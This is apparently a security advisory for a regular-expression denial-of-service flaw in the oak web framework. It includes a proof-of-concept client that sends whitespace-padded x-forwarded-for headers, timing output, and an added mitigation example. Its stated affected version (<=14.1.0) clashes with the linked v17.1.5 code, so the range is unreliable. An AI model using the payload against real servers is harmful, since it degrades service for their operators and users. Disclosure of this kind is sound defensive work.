
CVE-2025-55152 @oakserver/oak

Package

Manager: npm
Name: @oakserver/oak
Vulnerable Version: >=0 <=14.1.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

EPSS: 0.00051 (percentile 0.1555)

Details

Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers

### Summary

With a specially crafted value of the `x-forwarded-proto` or `x-forwarded-for` headers, it's possible to significantly slow down an oak server.

### Vulnerable Code

- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

### PoC

- setup

```
deno --version
deno 2.4.3
v8 13.7.152.14-rusty
typescript 5.8.3
```

- `server.ts`

```ts
import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({ proxy: true });
let i = 1;

app.use((ctx) => {
  // let url = ctx.request.url; // test1) x-forwarded-proto
  let ips = ctx.request.ips; // test2) x-forwarded-for
  console.log(`request ${i} received`);
  i++;
  ctx.response.body = "hello";
});

await app.listen({ port: 8080 });
```

- `client.ts`

```ts
const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000];
const data1 = lengths.map((l) => "A" + "A".repeat(l) + "A");
const data2 = lengths.map((l) => "A" + " ".repeat(l) + "A");

async function run(data: string[]) {
  for (let i = 0; i < data.length; i++) {
    const d = data[i];
    const start = performance.now();
    await fetch("http://localhost:8080", {
      headers: {
        // "x-forwarded-proto": d, // test1)
        "x-forwarded-for": d, // test2)
      },
    });
    const end = performance.now();
    console.log("length=%d, time=%d ms", d.length, end - start);
  }
}

console.log("\n[+] Test normal behavior");
await run(data1);
console.log("\n[+] Test payloads");
await run(data2);
```

- run

```
deno run --allow-net server.ts
deno run --allow-net client.ts

[+] Test normal behavior
length=2002, time=14 ms
length=4002, time=6 ms
length=8002, time=3 ms
length=16002, time=3 ms
length=32002, time=2 ms
length=64002, time=4 ms
length=128002, time=3 ms

[+] Test payloads
length=2002, time=7 ms
length=4002, time=22 ms
length=8002, time=77 ms
length=16002, time=241 ms
length=32002, time=947 ms
length=64002, time=4020 ms
length=128002, time=15840 ms
```

### Impact

A specially crafted value of the `x-forwarded-proto` or `x-forwarded-for` headers can be used to significantly slow down an oak server.

### Similar Issues

- https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
- https://github.com/denoland/deno/pull/17722
- https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
- https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff
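The mitigation pattern for the class of issue described above, as an added example (not oak's own code or its fix): reject oversized proxy headers before anything derives values from them, and parse the remainder in a single linear pass instead of a backtracking regular expression. The length limit, the `HeaderSource` interface and the function names are assumptions.

```typescript
// Added example, not code from the oak project. Shows the defensive pattern for
// attacker-controlled proxy headers: bound the input size first, then parse it
// in one linear pass so a long run of spaces cannot drive super-linear work.
const MAX_FORWARDED_HEADER_LENGTH = 1024; // assumed limit; tune per deployment

// Minimal view of a header map; the standard Headers class satisfies it.
interface HeaderSource {
  get(name: string): string | null;
}

type ForwardedResult =
  | { ok: true; ips: string[]; proto: string | null }
  | { ok: false; reason: string };

// Splits x-forwarded-for on commas and trims spaces/tabs without any regex.
function parseForwardedFor(header: string): string[] {
  const ips: string[] = [];
  let start = 0;
  for (let i = 0; i <= header.length; i++) {
    if (i === header.length || header[i] === ",") {
      let a = start;
      let b = i;
      while (a < b && (header[a] === " " || header[a] === "\t")) a++;
      while (b > a && (header[b - 1] === " " || header[b - 1] === "\t")) b--;
      if (b > a) ips.push(header.slice(a, b));
      start = i + 1;
    }
  }
  return ips;
}

// A scheme is a short token (ALPHA followed by ALPHA / DIGIT / "+" / "-" / ".").
// The pattern has no nested or overlapping quantifiers, so matching is linear.
function isValidForwardedProto(value: string): boolean {
  return value.length <= 32 && /^[A-Za-z][A-Za-z0-9+.-]*$/.test(value);
}

// Run this before computing anything derived from the headers (e.g. request.ips).
function checkForwardedHeaders(headers: HeaderSource): ForwardedResult {
  for (const name of ["x-forwarded-for", "x-forwarded-proto"]) {
    const value = headers.get(name);
    if (value !== null && value.length > MAX_FORWARDED_HEADER_LENGTH) {
      return { ok: false, reason: `${name} exceeds ${MAX_FORWARDED_HEADER_LENGTH} bytes` };
    }
  }
  const proto = headers.get("x-forwarded-proto")?.trim() ?? null;
  if (proto !== null && !isValidForwardedProto(proto)) {
    return { ok: false, reason: "x-forwarded-proto is not a valid scheme token" };
  }
  const xff = headers.get("x-forwarded-for");
  return { ok: true, ips: xff === null ? [] : parseForwardedFor(xff), proto };
}
```

A rejected result should be answered with a 400 before the request reaches application middleware, so the cost of a hostile header stays constant.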

Metadata

Created: 2025-08-12T00:15:00Z
Modified: 2025-08-12T00:15:00Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-r3v7-pc4g-7xp9/GHSA-r3v7-pc4g-7xp9.json
CWE IDs: ["CWE-400"]
Alternative ID: GHSA-r3v7-pc4g-7xp9
Finding: F211
Auto approve: 1